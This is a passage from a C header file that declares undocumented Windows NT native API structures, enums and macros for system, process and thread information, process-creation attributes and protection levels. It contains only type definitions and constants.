} SYSTEM_PROCESS_ID_INFORMATION, *PSYSTEM_PROCESS_ID_INFORMATION;
typedef struct _SYSTEM_SECUREBOOT_INFORMATION {
BOOLEAN SecureBootEnabled;
BOOLEAN SecureBootCapable;
} SYSTEM_SECUREBOOT_INFORMATION, *PSYSTEM_SECUREBOOT_INFORMATION;
typedef struct _SYSTEM_SECUREBOOT_POLICY_INFORMATION {
GUID PolicyPublisher;
ULONG PolicyVersion;
ULONG PolicyOptions;
} SYSTEM_SECUREBOOT_POLICY_INFORMATION, *PSYSTEM_SECUREBOOT_POLICY_INFORMATION;
typedef struct _SYSTEM_SECUREBOOT_POLICY_FULL_INFORMATION {
SYSTEM_SECUREBOOT_POLICY_INFORMATION PolicyInformation;
ULONG PolicySize;
UCHAR Policy[1];
} SYSTEM_SECUREBOOT_POLICY_FULL_INFORMATION, *PSYSTEM_SECUREBOOT_POLICY_FULL_INFORMATION;
typedef struct _SYSTEM_BASIC_INFORMATION {
ULONG Reserved;
ULONG TimerResolution;
ULONG PageSize;
ULONG NumberOfPhysicalPages;
ULONG LowestPhysicalPageNumber;
ULONG HighestPhysicalPageNumber;
ULONG AllocationGranularity;
ULONG_PTR MinimumUserModeAddress;
ULONG_PTR MaximumUserModeAddress;
ULONG_PTR ActiveProcessorsAffinityMask;
CCHAR NumberOfProcessors;
} SYSTEM_BASIC_INFORMATION, *PSYSTEM_BASIC_INFORMATION;
typedef struct _SYSTEM_ISOLATED_USER_MODE_INFORMATION {
BOOLEAN SecureKernelRunning : 1;
BOOLEAN HvciEnabled : 1;
BOOLEAN HvciStrictMode : 1;
BOOLEAN DebugEnabled : 1;
BOOLEAN FirmwarePageProtection : 1;
BOOLEAN EncryptionKeyAvailable : 1;
BOOLEAN SpareFlags : 2;
BOOLEAN TrustletRunning : 1;
BOOLEAN HvciDisableAllowed : 1;
BOOLEAN HardwareEnforcedVbs : 1;
BOOLEAN NoSecrets : 1;
BOOLEAN EncryptionKeyPersistent : 1;
BOOLEAN HardwareEnforcedHvpt : 1;
BOOLEAN HardwareHvptAvailable : 1;
BOOLEAN SpareFlags2 : 1;
BOOLEAN Spare0[6];
ULONGLONG Spare1;
} SYSTEM_ISOLATED_USER_MODE_INFORMATION, *PSYSTEM_ISOLATED_USER_MODE_INFORMATION;
typedef struct _SYSTEM_PROCESSOR_FEATURES_INFORMATION { //chappell
ULONGLONG ProcessorFeatureBits;
ULONGLONG Reserved[3];
} SYSTEM_PROCESSOR_FEATURES_INFORMATION, * PSYSTEM_PROCESSOR_FEATURES_INFORMATION;
typedef struct _SYSTEM_POOL_ENTRY {
BOOLEAN Allocated;
BOOLEAN Spare0;
USHORT AllocatorBackTraceIndex;
ULONG Size;
union {
UCHAR Tag[4];
ULONG TagUlong;
PVOID ProcessChargedQuota;
};
} SYSTEM_POOL_ENTRY, * PSYSTEM_POOL_ENTRY;
typedef struct _SYSTEM_POOL_INFORMATION {
SIZE_T TotalSize;
PVOID FirstEntry;
USHORT EntryOverhead;
BOOLEAN PoolTagPresent;
BOOLEAN Spare0;
ULONG NumberOfEntries;
SYSTEM_POOL_ENTRY Entries[1];
} SYSTEM_POOL_INFORMATION, * PSYSTEM_POOL_INFORMATION;
typedef struct _SYSTEM_POOLTAG {
union {
UCHAR Tag[4];
ULONG TagUlong;
};
ULONG PagedAllocs;
ULONG PagedFrees;
SIZE_T PagedUsed;
ULONG NonPagedAllocs;
ULONG NonPagedFrees;
SIZE_T NonPagedUsed;
} SYSTEM_POOLTAG, * PSYSTEM_POOLTAG;
typedef struct _SYSTEM_BIGPOOL_ENTRY {
union {
PVOID VirtualAddress;
ULONG_PTR NonPaged : 1;
};
SIZE_T SizeInBytes;
union {
UCHAR Tag[4];
ULONG TagUlong;
};
} SYSTEM_BIGPOOL_ENTRY, * PSYSTEM_BIGPOOL_ENTRY;
typedef struct _SYSTEM_POOLTAG_INFORMATION {
ULONG Count;
SYSTEM_POOLTAG TagInfo[1];
} SYSTEM_POOLTAG_INFORMATION, * PSYSTEM_POOLTAG_INFORMATION;
typedef struct _SYSTEM_SESSION_POOLTAG_INFORMATION {
SIZE_T NextEntryOffset;
ULONG SessionId;
ULONG Count;
SYSTEM_POOLTAG TagInfo[1];
} SYSTEM_SESSION_POOLTAG_INFORMATION, * PSYSTEM_SESSION_POOLTAG_INFORMATION;
typedef struct _SYSTEM_BIGPOOL_INFORMATION {
ULONG Count;
SYSTEM_BIGPOOL_ENTRY AllocatedInfo[1];
} SYSTEM_BIGPOOL_INFORMATION, * PSYSTEM_BIGPOOL_INFORMATION;
typedef struct _SYSTEM_FIRMWARE_PARTITION_INFORMATION {
UNICODE_STRING FirmwarePartition; // \Device\HarddiskX
} SYSTEM_FIRMWARE_PARTITION_INFORMATION, * PSYSTEM_FIRMWARE_PARTITION_INFORMATION;
typedef struct _RTL_PROCESS_BACKTRACE_INFORMATION {
PCHAR SymbolicBackTrace;
ULONG TraceCount;
USHORT Index;
USHORT Depth;
PVOID BackTrace[32];
} RTL_PROCESS_BACKTRACE_INFORMATION, * PRTL_PROCESS_BACKTRACE_INFORMATION;
typedef struct _RTL_PROCESS_BACKTRACES {
ULONG CommittedMemory;
ULONG ReservedMemory;
ULONG NumberOfBackTraceLookups;
ULONG NumberOfBackTraces;
RTL_PROCESS_BACKTRACE_INFORMATION BackTraces[1];
} RTL_PROCESS_BACKTRACES, * PRTL_PROCESS_BACKTRACES;
typedef enum _PROCESSINFOCLASS {
ProcessBasicInformation = 0,
ProcessQuotaLimits = 1,
ProcessIoCounters = 2,
ProcessVmCounters = 3,
ProcessTimes = 4,
ProcessBasePriority = 5,
ProcessRaisePriority = 6,
ProcessDebugPort = 7,
ProcessExceptionPort = 8,
ProcessAccessToken = 9,
ProcessLdtInformation = 10,
ProcessLdtSize = 11,
ProcessDefaultHardErrorMode = 12,
ProcessIoPortHandlers = 13,
ProcessPooledUsageAndLimits = 14,
ProcessWorkingSetWatch = 15,
ProcessUserModeIOPL = 16,
ProcessEnableAlignmentFaultFixup = 17,
ProcessPriorityClass = 18,
ProcessWx86Information = 19,
ProcessHandleCount = 20,
ProcessAffinityMask = 21,
ProcessPriorityBoost = 22,
ProcessDeviceMap = 23,
ProcessSessionInformation = 24,
ProcessForegroundInformation = 25,
ProcessWow64Information = 26,
ProcessImageFileName = 27,
ProcessLUIDDeviceMapsEnabled = 28,
ProcessBreakOnTermination = 29,
ProcessDebugObjectHandle = 30,
ProcessDebugFlags = 31,
ProcessHandleTracing = 32,
ProcessIoPriority = 33,
ProcessExecuteFlags = 34,
ProcessTlsInformation = 35,
ProcessCookie = 36,
ProcessImageInformation = 37,
ProcessCycleTime = 38,
ProcessPagePriority = 39,
ProcessInstrumentationCallback = 40,
ProcessThreadStackAllocation = 41,
ProcessWorkingSetWatchEx = 42,
ProcessImageFileNameWin32 = 43,
ProcessImageFileMapping = 44,
ProcessAffinityUpdateMode = 45,
ProcessMemoryAllocationMode = 46,
ProcessGroupInformation = 47,
ProcessTokenVirtualizationEnabled = 48,
ProcessConsoleHostProcess = 49, //ProcessOwnerInformation
ProcessWindowInformation = 50,
ProcessHandleInformation = 51,
ProcessMitigationPolicy = 52,
ProcessDynamicFunctionTableInformation = 53,
ProcessHandleCheckingMode = 54,
ProcessKeepAliveCount = 55,
ProcessRevokeFileHandles = 56,
ProcessWorkingSetControl = 57,
ProcessHandleTable = 58,
ProcessCheckStackExtentsMode = 59,
ProcessCommandLineInformation = 60,
ProcessProtectionInformation = 61,
ProcessMemoryExhaustion = 62,
ProcessFaultInformation = 63,
ProcessTelemetryIdInformation = 64,
ProcessCommitReleaseInformation = 65,
ProcessDefaultCpuSetsInformation = 66,
ProcessAllowedCpuSetsInformation = 67,
ProcessSubsystemProcess = 68,
ProcessJobMemoryInformation = 69,
ProcessInPrivate = 70,
ProcessRaiseUMExceptionOnInvalidHandleClose = 71,
ProcessIumChallengeResponse = 72,
ProcessChildProcessInformation = 73,
ProcessHighGraphicsPriorityInformation = 74,
ProcessSubsystemInformation = 75,
ProcessEnergyValues = 76,
ProcessActivityThrottleState = 77,
ProcessActivityThrottlePolicy = 78,
ProcessWin32kSyscallFilterInformation = 79,
ProcessDisableSystemAllowedCpuSets = 80,
ProcessWakeInformation = 81,
ProcessEnergyTrackingState = 82,
ProcessManageWritesToExecutableMemory = 83,
ProcessCaptureTrustletLiveDump = 84,
ProcessTelemetryCoverage = 85,
ProcessEnclaveInformation = 86,
ProcessEnableReadWriteVmLogging = 87,
ProcessUptimeInformation = 88,
ProcessImageSection = 89,
ProcessDebugAuthInformation = 90,
ProcessSystemResourceManagement = 91,
ProcessSequenceNumber = 92,
ProcessLoaderDetour = 93,
ProcessSecurityDomainInformation = 94,
ProcessCombineSecurityDomainsInformation = 95,
ProcessEnableLogging = 96,
ProcessLeapSecondInformation = 97,
ProcessFiberShadowStackAllocation = 98,
ProcessFreeFiberShadowStackAllocation = 99,
ProcessAltSystemCallInformation = 100,
ProcessDynamicEHContinuationTargets = 101,
ProcessDynamicEnforcedCetCompatibleRanges = 102,
ProcessCreateStateChange = 103,
ProcessApplyStateChange = 104,
ProcessEnableOptionalXStateFeatures = 105,
ProcessAltPrefetchParam = 106,
ProcessAssignCpuPartitions = 107,
ProcessPriorityClassEx = 108,
ProcessMembershipInformation = 109,
ProcessEffectiveIoPriority = 110,
ProcessEffectivePagePriority = 111,
ProcessSchedulerSharedData = 112,
ProcessSlistRollbackInformation = 113,
ProcessNetworkIoCounters = 114,
ProcessFindFirstThreadByTebValue = 115,
ProcessEnclaveAddressSpaceRestriction = 116,
ProcessAvailableCpus = 117,
MaxProcessInfoClass
} PROCESSINFOCLASS;
typedef enum _THREADINFOCLASS {
ThreadBasicInformation,
ThreadTimes,
ThreadPriority,
ThreadBasePriority,
ThreadAffinityMask,
ThreadImpersonationToken,
ThreadDescriptorTableEntry,
ThreadEnableAlignmentFaultFixup,
ThreadEventPair,
ThreadQuerySetWin32StartAddress,
ThreadZeroTlsCell,
ThreadPerformanceCount,
ThreadAmILastThread,
ThreadIdealProcessor,
ThreadPriorityBoost,
ThreadSetTlsArrayAddress,
ThreadIsIoPending,
ThreadHideFromDebugger,
ThreadBreakOnTermination,
ThreadSwitchLegacyState,
ThreadIsTerminated,
ThreadLastSystemCall,
ThreadIoPriority,
ThreadCycleTime,
ThreadPagePriority,
ThreadActualBasePriority,
ThreadTebInformation,
ThreadCSwitchMon,
ThreadCSwitchPmu,
ThreadWow64Context,
ThreadGroupInformation,
ThreadUmsInformation,
ThreadCounterProfiling,
ThreadIdealProcessorEx,
ThreadCpuAccountingInformation,
ThreadSuspendCount,
ThreadHeterogeneousCpuPolicy,
ThreadContainerId,
ThreadNameInformation,
ThreadSelectedCpuSets,
ThreadSystemThreadInformation,
ThreadActualGroupAffinity,
ThreadDynamicCodePolicyInfo,
ThreadExplicitCaseSensitivity,
ThreadWorkOnBehalfTicket,
ThreadSubsystemInformation,
ThreadDbgkWerReportActive,
ThreadAttachContainer,
ThreadManageWritesToExecutableMemory,
ThreadPowerThrottlingState,
ThreadWorkloadClass,
ThreadCreateStateChange,
ThreadApplyStateChange,
ThreadStrongerBadHandleChecks,
ThreadEffectiveIoPriority,
ThreadEffectivePagePriority,
ThreadUpdateLockOwnership,
ThreadSchedulerSharedDataSlot,
ThreadTebInformationAtomic,
ThreadIndexInformation,
MaxThreadInfoClass
} THREADINFOCLASS;
typedef struct _PROCESS_BASIC_INFORMATION {
NTSTATUS ExitStatus;
PVOID PebBaseAddress;
ULONG_PTR AffinityMask;
KPRIORITY BasePriority;
ULONG_PTR UniqueProcessId;
ULONG_PTR InheritedFromUniqueProcessId;
} PROCESS_BASIC_INFORMATION, *PPROCESS_BASIC_INFORMATION;
typedef struct _THREAD_BASIC_INFORMATION {
NTSTATUS ExitStatus;
PVOID TebBaseAddress;
CLIENT_ID ClientId;
ULONG_PTR AffinityMask;
KPRIORITY Priority;
LONG BasePriority;
} THREAD_BASIC_INFORMATION, *PTHREAD_BASIC_INFORMATION;
// taken from ph2(whatever)
typedef struct _THREAD_LAST_SYSCALL_INFORMATION {
PVOID FirstArgument;
USHORT SystemCallNumber;
#ifdef WIN64
USHORT Pad[0x3]; // since REDSTONE2
#else
USHORT Pad[0x1]; // since REDSTONE2
#endif
ULONG64 WaitTime;
} THREAD_LAST_SYSCALL_INFORMATION, * PTHREAD_LAST_SYSCALL_INFORMATION;
typedef struct _THREAD_NAME_INFORMATION {
UNICODE_STRING ThreadName;
} THREAD_NAME_INFORMATION, * PTHREAD_NAME_INFORMATION;
typedef struct _PROCESS_EXTENDED_BASIC_INFORMATION {
SIZE_T Size;
PROCESS_BASIC_INFORMATION BasicInfo;
union
{
ULONG Flags;
struct
{
ULONG IsProtectedProcess : 1;
ULONG IsWow64Process : 1;
ULONG IsProcessDeleting : 1;
ULONG IsCrossSessionCreate : 1;
ULONG IsFrozen : 1;
ULONG IsBackground : 1;
ULONG IsStronglyNamed : 1;
ULONG IsSecureProcess : 1;
ULONG IsSubsystemProcess : 1;
ULONG SpareBits : 23;
} DUMMYSTRUCTNAME;
} DUMMYUNIONNAME;
} PROCESS_EXTENDED_BASIC_INFORMATION, *PPROCESS_EXTENDED_BASIC_INFORMATION;
typedef struct _PROCESS_ACCESS_TOKEN {
HANDLE Token;
HANDLE Thread;
} PROCESS_ACCESS_TOKEN, *PPROCESS_ACCESS_TOKEN;
typedef struct _PROCESS_HANDLE_TABLE_ENTRY_INFO {
HANDLE HandleValue;
ULONG_PTR HandleCount;
ULONG_PTR PointerCount;
ULONG GrantedAccess;
ULONG ObjectTypeIndex;
ULONG HandleAttributes;
ULONG Reserved;
} PROCESS_HANDLE_TABLE_ENTRY_INFO, *PPROCESS_HANDLE_TABLE_ENTRY_INFO;
typedef struct _PROCESS_HANDLE_SNAPSHOT_INFORMATION {
ULONG_PTR NumberOfHandles;
ULONG_PTR Reserved;
PROCESS_HANDLE_TABLE_ENTRY_INFO Handles[1];
} PROCESS_HANDLE_SNAPSHOT_INFORMATION, *PPROCESS_HANDLE_SNAPSHOT_INFORMATION;
typedef enum _PROCESS_STATE_CHANGE_TYPE {
ProcessStateChangeSuspend,
ProcessStateChangeResume,
ProcessStateChangeMax,
} PROCESS_STATE_CHANGE_TYPE, *PPROCESS_STATE_CHANGE_TYPE;
typedef enum _THREAD_STATE_CHANGE_TYPE {
ThreadStateChangeSuspend,
ThreadStateChangeResume,
ThreadStateChangeMax,
} THREAD_STATE_CHANGE_TYPE, *PTHREAD_STATE_CHANGE_TYPE;
//
// Process/Thread System and User Time
// NtQueryInformationProcess using ProcessTimes
// NtQueryInformationThread using ThreadTimes
//
typedef struct _KERNEL_USER_TIMES {
LARGE_INTEGER CreateTime;
LARGE_INTEGER ExitTime;
LARGE_INTEGER KernelTime;
LARGE_INTEGER UserTime;
} KERNEL_USER_TIMES, *PKERNEL_USER_TIMES;
typedef enum _PS_MITIGATION_OPTION {
PS_MITIGATION_OPTION_NX,
PS_MITIGATION_OPTION_SEHOP,
PS_MITIGATION_OPTION_FORCE_RELOCATE_IMAGES,
PS_MITIGATION_OPTION_HEAP_TERMINATE,
PS_MITIGATION_OPTION_BOTTOM_UP_ASLR,
PS_MITIGATION_OPTION_HIGH_ENTROPY_ASLR,
PS_MITIGATION_OPTION_STRICT_HANDLE_CHECKS,
PS_MITIGATION_OPTION_WIN32K_SYSTEM_CALL_DISABLE,
PS_MITIGATION_OPTION_EXTENSION_POINT_DISABLE,
PS_MITIGATION_OPTION_PROHIBIT_DYNAMIC_CODE,
PS_MITIGATION_OPTION_CONTROL_FLOW_GUARD,
PS_MITIGATION_OPTION_BLOCK_NON_MICROSOFT_BINARIES,
PS_MITIGATION_OPTION_FONT_DISABLE,
PS_MITIGATION_OPTION_IMAGE_LOAD_NO_REMOTE,
PS_MITIGATION_OPTION_IMAGE_LOAD_NO_LOW_LABEL,
PS_MITIGATION_OPTION_IMAGE_LOAD_PREFER_SYSTEM32,
PS_MITIGATION_OPTION_RETURN_FLOW_GUARD,
PS_MITIGATION_OPTION_LOADER_INTEGRITY_CONTINUITY,
PS_MITIGATION_OPTION_STRICT_CONTROL_FLOW_GUARD,
PS_MITIGATION_OPTION_RESTRICT_SET_THREAD_CONTEXT,
PS_MITIGATION_OPTION_ROP_STACKPIVOT,
PS_MITIGATION_OPTION_ROP_CALLER_CHECK,
PS_MITIGATION_OPTION_ROP_SIMEXEC,
PS_MITIGATION_OPTION_EXPORT_ADDRESS_FILTER,
PS_MITIGATION_OPTION_EXPORT_ADDRESS_FILTER_PLUS,
PS_MITIGATION_OPTION_RESTRICT_CHILD_PROCESS_CREATION,
PS_MITIGATION_OPTION_IMPORT_ADDRESS_FILTER,
PS_MITIGATION_OPTION_MODULE_TAMPERING_PROTECTION,
PS_MITIGATION_OPTION_RESTRICT_INDIRECT_BRANCH_PREDICTION,
PS_MITIGATION_OPTION_SPECULATIVE_STORE_BYPASS_DISABLE,
PS_MITIGATION_OPTION_ALLOW_DOWNGRADE_DYNAMIC_CODE_POLICY,
PS_MITIGATION_OPTION_CET_SHADOW_STACKS,
PS_MITIGATION_OPTION_USER_CET_SET_CONTEXT_IP_VALIDATION,
PS_MITIGATION_OPTION_BLOCK_NON_CET_BINARIES,
PS_MITIGATION_OPTION_CET_DYNAMIC_APIS_OUT_OF_PROC_ONLY,
PS_MITIGATION_OPTION_REDIRECTION_TRUST,
PS_MITIGATION_OPTION_RESTRICT_CORE_SHARING,
PS_MITIGATION_OPTION_FSCTL_SYSTEM_CALL_DISABLE
} PS_MITIGATION_OPTION;
typedef enum _PS_CREATE_STATE {
PsCreateInitialState,
PsCreateFailOnFileOpen,
PsCreateFailOnSectionCreate,
PsCreateFailExeFormat,
PsCreateFailMachineMismatch,
PsCreateFailExeName,
PsCreateSuccess,
PsCreateMaximumStates
} PS_CREATE_STATE;
typedef struct _PS_CREATE_INFO {
SIZE_T Size;
PS_CREATE_STATE State;
union
{
struct
{
union
{
ULONG InitFlags;
struct
{
UCHAR WriteOutputOnExit : 1;
UCHAR DetectManifest : 1;
UCHAR IFEOSkipDebugger : 1;
UCHAR IFEODoNotPropagateKeyState : 1;
UCHAR SpareBits1 : 4;
UCHAR SpareBits2 : 8;
USHORT ProhibitedImageCharacteristics : 16;
};
};
ACCESS_MASK AdditionalFileAccess;
} InitState;
struct
{
HANDLE FileHandle;
} FailSection;
struct
{
USHORT DllCharacteristics;
} ExeFormat;
struct
{
HANDLE IFEOKey;
} ExeName;
struct
{
union
{
ULONG OutputFlags;
struct
{
UCHAR ProtectedProcess : 1;
UCHAR AddressSpaceOverride : 1;
UCHAR DevOverrideEnabled : 1;
UCHAR ManifestDetected : 1;
UCHAR ProtectedProcessLight : 1;
UCHAR SpareBits1 : 3;
UCHAR SpareBits2 : 8;
USHORT SpareBits3 : 16;
};
};
HANDLE FileHandle;
HANDLE SectionHandle;
ULONGLONG UserProcessParametersNative;
ULONG UserProcessParametersWow64;
ULONG CurrentParameterFlags;
ULONGLONG PebAddressNative;
ULONG PebAddressWow64;
ULONGLONG ManifestAddress;
ULONG ManifestSize;
} SuccessState;
};
} PS_CREATE_INFO, *PPS_CREATE_INFO;
typedef struct _PS_ATTRIBUTE {
ULONG Attribute;
SIZE_T Size;
union
{
ULONG Value;
PVOID ValuePtr;
};
PSIZE_T ReturnLength;
} PS_ATTRIBUTE, *PPS_ATTRIBUTE;
typedef struct _PS_ATTRIBUTE_LIST {
SIZE_T TotalLength;
PS_ATTRIBUTE Attributes[1];
} PS_ATTRIBUTE_LIST, *PPS_ATTRIBUTE_LIST;
typedef enum _PS_PROTECTED_TYPE {
PsProtectedTypeNone,
PsProtectedTypeProtectedLight,
PsProtectedTypeProtected,
PsProtectedTypeMax
} PS_PROTECTED_TYPE;
typedef enum _PS_PROTECTED_SIGNER {
PsProtectedSignerNone,
PsProtectedSignerAuthenticode,
PsProtectedSignerCodeGen,
PsProtectedSignerAntimalware,
PsProtectedSignerLsa,
PsProtectedSignerWindows,
PsProtectedSignerWinTcb,
PsProtectedSignerWinSystem,
PsProtectedSignerApp,
PsProtectedSignerMax
} PS_PROTECTED_SIGNER;
#define PS_PROTECTED_SIGNER_MASK 0xFF
#define PS_PROTECTED_AUDIT_MASK 0x08
#define PS_PROTECTED_TYPE_MASK 0x07
// from ph2
#define PsProtectedValue(aSigner, aAudit, aType) ( \
(((aSigner) & PS_PROTECTED_SIGNER_MASK) << 4) | \
(((aAudit) & PS_PROTECTED_AUDIT_MASK) << 3) | \
((aType) & PS_PROTECTED_TYPE_MASK)\
)
#define InitializePsProtection(aProtectionLevelPtr, aSigner, aAudit, aType) { \
(aProtectionLevelPtr)->Signer = aSigner; \
(aProtectionLevelPtr)->Audit = aAudit; \
(aProtectionLevelPtr)->Type = aType; \
}
typedef struct _PS_PROTECTION {
union
{
UCHAR Level;
struct
{
UCHAR Type : 3;
UCHAR Audit : 1;
UCHAR Signer : 4;
};
};
} PS_PROTECTION, *PPS_PROTECTION;
// begin_rev
#define PS_ATTRIBUTE_NUMBER_MASK 0x0000ffff
#define PS_ATTRIBUTE_THREAD 0x00010000
#define PS_ATTRIBUTE_INPUT 0x00020000
#define PS_ATTRIBUTE_ADDITIVE 0x00040000
// end_rev
typedef enum _PS_ATTRIBUTE_NUM {
PsAttributeParentProcess,
PsAttributeDebugPort,
PsAttributeToken,
PsAttributeClientId,
PsAttributeTebAddress,
PsAttributeImageName,
PsAttributeImageInfo,
PsAttributeMemoryReserve,
PsAttributePriorityClass,
PsAttributeErrorMode,
PsAttributeStdHandleInfo,
PsAttributeHandleList,
PsAttributeGroupAffinity,
PsAttributePreferredNode,
PsAttributeIdealProcessor,
PsAttributeUmsThread,
PsAttributeMitigationOptions,
PsAttributeProtectionLevel,
PsAttributeSecureProcess,
PsAttributeJobList,
PsAttributeChildProcessPolicy,
PsAttributeAllApplicationPackagesPolicy,
PsAttributeWin32kFilter,
PsAttributeSafeOpenPromptOriginClaim,
PsAttributeBnoIsolation,
PsAttributeDesktopAppPolicy,
PsAttributeChpe,
PsAttributeMitigationAuditOptions,
PsAttributeMachineType,
PsAttributeComponentFilter,
PsAttributeEnableOptionalXStateFeatures,
PsAttributeSupportedMachines,
PsAttributeSveVectorLength,
PsAttributeMax
} PS_ATTRIBUTE_NUM;
#define PsAttributeValue(Number, Thread, Input, Unknown) \
(((Number) & PS_ATTRIBUTE_NUMBER_MASK) | \
((Thread) ? PS_ATTRIBUTE_THREAD : 0) | \
((Input) ? PS_ATTRIBUTE_INPUT : 0) | \
((Unknown) ? PS_ATTRIBUTE_ADDITIVE : 0))
#define PS_ATTRIBUTE_PARENT_PROCESS \
PsAttributeValue(PsAttributeParentProcess, FALSE, TRUE, TRUE)
#define PS_ATTRIBUTE_DEBUG_OBJECT \
PsAttributeValue(PsAttributeDebugObject, FALSE, TRUE, TRUE)
#define PS_ATTRIBUTE_TOKEN \
PsAttributeValue(PsAttributeToken, FALSE, TRUE, TRUE)
#define PS_ATTRIBUTE_CLIENT_ID \
PsAttributeValue(PsAttributeClientId, TRUE, FALSE, FALSE)
#define PS_ATTRIBUTE_TEB_ADDRESS \
PsAttributeValue(PsAttributeTebAddress, TRUE, FALSE, FALSE)
#define PS_ATTRIBUTE_IMAGE_NAME \
PsAttributeValue(PsAttributeImageName, FALSE, TRUE, FALSE)
#define PS_ATTRIBUTE_IMAGE_INFO \
PsAttributeValue(PsAttributeImageInfo, FALSE, FALSE, FALSE)
#define PS_ATTRIBUTE_MEMORY_RESERVE \
PsAttributeValue(PsAttributeMemoryReserve, FALSE, TRUE, FALSE)
#define PS_ATTRIBUTE_PRIORITY_CLASS \
PsAttributeValue(PsAttributePriorityClass, FALSE, TRUE, FALSE)
#define PS_ATTRIBUTE_ERROR_MODE \
PsAttributeValue(PsAttributeErrorMode, FALSE, TRUE, FALSE)
#define PS_ATTRIBUTE_STD_HANDLE_INFO \
PsAttributeValue(PsAttributeStdHandleInfo, FALSE, TRUE, FALSE)
#define PS_ATTRIBUTE_HANDLE_LIST \
PsAttributeValue(PsAttributeHandleList, FALSE, TRUE, FALSE)
#define PS_ATTRIBUTE_GROUP_AFFINITY \
PsAttributeValue(PsAttributeGroupAffinity, TRUE, TRUE, FALSE)
#define PS_ATTRIBUTE_PREFERRED_NODE \
PsAttributeValue(PsAttributePreferredNode, FALSE, TRUE, FALSE)
#define PS_ATTRIBUTE_IDEAL_PROCESSOR \
PsAttributeValue(PsAttributeIdealProcessor, TRUE, TRUE, FALSE)
#define PS_ATTRIBUTE_UMS_THREAD \
PsAttributeValue(PsAttributeUmsThread, TRUE, TRUE, FALSE)
#define PS_ATTRIBUTE_MITIGATION_OPTIONS \
PsAttributeValue(PsAttributeMitigationOptions, FALSE, TRUE, FALSE)
#define PS_ATTRIBUTE_PROTECTION_LEVEL \
PsAttributeValue(PsAttributeProtectionLevel, FALSE, TRUE, TRUE)
#define PS_ATTRIBUTE_SECURE_PROCESS \
PsAttributeValue(PsAttributeSecureProcess, FALSE, TRUE, FALSE)
#define PS_ATTRIBUTE_JOB_LIST \
PsAttributeValue(PsAttributeJobList, FALSE, TRUE, FALSE)
#define PS_ATTRIBUTE_CHILD_PROCESS_POLICY \
PsAttributeValue(PsAttributeChildProcessPolicy, FALSE, TRUE, FALSE)
#define PS_ATTRIBUTE_ALL_APPLICATION_PACKAGES_POLICY \
PsAttributeValue(PsAttributeAllApplicationPackagesPolicy, FALSE, TRUE, FALSE)
#define PS_ATTRIBUTE_WIN32K_FILTER \
PsAttributeValue(PsAttributeWin32kFilter, FALSE, TRUE, FALSE)
#define PS_ATTRIBUTE_SAFE_OPEN_PROMPT_ORIGIN_CLAIM \
PsAttributeValue(PsAttributeSafeOpenPromptOriginClaim, FALSE, TRUE, FALSE)
#define PS_ATTRIBUTE_BNO_ISOLATION \
PsAttributeValue(PsAttributeBnoIsolation, FALSE, TRUE, FALSE)
#define PS_ATTRIBUTE_DESKTOP_APP_POLICY \
PsAttributeValue(PsAttributeDesktopAppPolicy, FALSE, TRUE, FALSE)
#define PS_ATTRIBUTE_CHPE \
PsAttributeValue(PsAttributeChpe, FALSE, TRUE, TRUE)
#define PS_ATTRIBUTE_MITIGATION_AUDIT_OPTIONS \
PsAttributeValue(PsAttributeMitigationAuditOptions, FALSE, TRUE, FALSE)
#define PS_ATTRIBUTE_MACHINE_TYPE \
PsAttributeValue(PsAttributeMachineType, FALSE, TRUE, TRUE)
#define PS_ATTRIBUTE_COMPONENT_FILTER \
PsAttributeValue(PsAttributeComponentFilter, FALSE, TRUE, FALSE)
#define PS_ATTRIBUTE_ENABLE_OPTIONAL_XSTATE_FEATURES \
PsAttributeValue(PsAttributeEnableOptionalXStateFeatures, TRUE, TRUE, FALSE)
#define RTL_USER_PROC_PARAMS_NORMALIZED 0x00000001
#define RTL_USER_PROC_PROFILE_USER 0x00000002
#define RTL_USER_PROC_PROFILE_KERNEL 0x00000004
#define RTL_USER_PROC_PROFILE_SERVER 0x00000008
#define RTL_USER_PROC_RESERVE_1MB 0x00000020
#define RTL_USER_PROC_RESERVE_16MB 0x00000040
#define RTL_USER_PROC_CASE_SENSITIVE 0x00000080
#define RTL_USER_PROC_DISABLE_HEAP_DECOMMIT 0x00000100
#define RTL_USER_PROC_DLL_REDIRECTION_LOCAL 0x00001000
#define RTL_USER_PROC_APP_MANIFEST_PRESENT 0x00002000
#define RTL_USER_PROC_IMAGE_KEY_MISSING 0x00004000
#define RTL_USER_PROC_DEV_OVERRIDE_ENABLED 0x00008000
#define RTL_USER_PROC_OPTIN_PROCESS 0x00020000
#define RTL_USER_PROC_SESSION_OWNER 0x00040000
#define RTL_USER_PROC_HANDLE_USER_CALLBACK_EXCEPTIONS 0x00080000
#define RTL_USER_PROC_PROTECTED_PROCESS 0x00400000
#define RTL_USER_PROC_SECURE_PROCESS 0x80000000
typedef struct _PROCESS_HANDLE_TRACING_ENABLE {
ULONG Flags;
} PROCESS_HANDLE_TRACING_ENABLE, * PPROCESS_HANDLE_TRACING_ENABLE;
#define PROCESS_HANDLE_TRACING_MAX_SLOTS 0x20000
typedef struct _PROCESS_HANDLE_TRACING_ENABLE_EX {
ULONG Flags;
ULONG TotalSlots;
} PROCESS_HANDLE_TRACING_ENABLE_EX, * PPROCESS_HANDLE_TRACING_ENABLE_EX;
#define PROCESS_HANDLE_TRACING_MAX_STACKS 16
#define PROCESS_HANDLE_TRACE_TYPE_OPEN 1
#define PROCESS_HANDLE_TRACE_TYPE_CLOSE 2
#define PROCESS_HANDLE_TRACE_TYPE_BADREF 3
typedef struct _PROCESS_HANDLE_TRACING_ENTRY {
HANDLE Handle;
CLIENT_ID ClientId;
ULONG Type;
PVOID Stacks[PROCESS_HANDLE_TRACING_MAX_STACKS];
} PROCESS_HANDLE_TRACING_ENTRY, * PPROCESS_HANDLE_TRACING_ENTRY;
typedef struct _PROCESS_HANDLE_TRACING_QUERY {
HANDLE Handle;
ULONG TotalTraces;
PROCESS_HANDLE_TRACING_ENTRY HandleTrace[1];
} PROCESS_HANDLE_TRACING_QUERY, * PPROCESS_HANDLE_TRACING_QUERY;
typedef struct _PROCESS_WS_WATCH_INFORMATION {
PVOID FaultingPc;
PVOID FaultingVa;
} PROCESS_WS_WATCH_INFORMATION, * PPROCESS_WS_WATCH_INFORMATION;
typedef struct _PROCESS_WS_WATCH_INFORMATION_EX {
PROCESS_WS_WATCH_INFORMATION BasicInfo;
ULONG_PTR FaultingThreadId;
ULONG_PTR Flags;
} PROCESS_WS_WATCH_INFORMATION_EX, * PPROCESS_WS_WATCH_INFORMATION_EX;
typedef struct _PROCESS_INSTRUMENTATION_CALLBACK_INFORMATION {
ULONG Version;
ULONG Reserved;
PVOID Callback;
